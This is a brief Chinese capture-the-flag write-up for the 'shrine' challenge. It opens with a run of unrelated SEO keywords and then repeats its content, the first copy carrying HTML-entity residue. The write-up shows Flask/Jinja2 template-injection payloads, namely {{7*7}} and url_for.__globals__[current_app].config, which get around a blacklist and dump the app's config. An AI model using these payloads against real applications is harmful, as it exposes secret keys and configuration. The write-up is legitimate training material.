建设网站模板免费下载,三维家是在网站上做还是在app上,天猫注册店铺流程及费用,装潢设计公司排行打开题目 直接查看源代码 发现注册了一个名为FLAG的config#xff0c;这里可能有flag#xff0c;
存在flask-jinja2模板注入#xff0c;
并且存在黑名单过滤
输入shrine/{{7*7}}验证成功 通过url_for()与globals()函数#xff0c;绕过黑名单
/shrine/{{url_for.__globa…打开题目 直接查看源代码 发现注册了一个名为FLAG的config这里可能有flag
存在flask-jinja2模板注入
并且存在黑名单过滤
输入shrine/{{7*7}}验证成功 通过url_for()与globals()函数绕过黑名单
/shrine/{{url_for.__globals__}} 发现了current_app()函数 查看这个里面的config。
/shrine/{{url_for.__globals__[current_app].config}} 得到flag
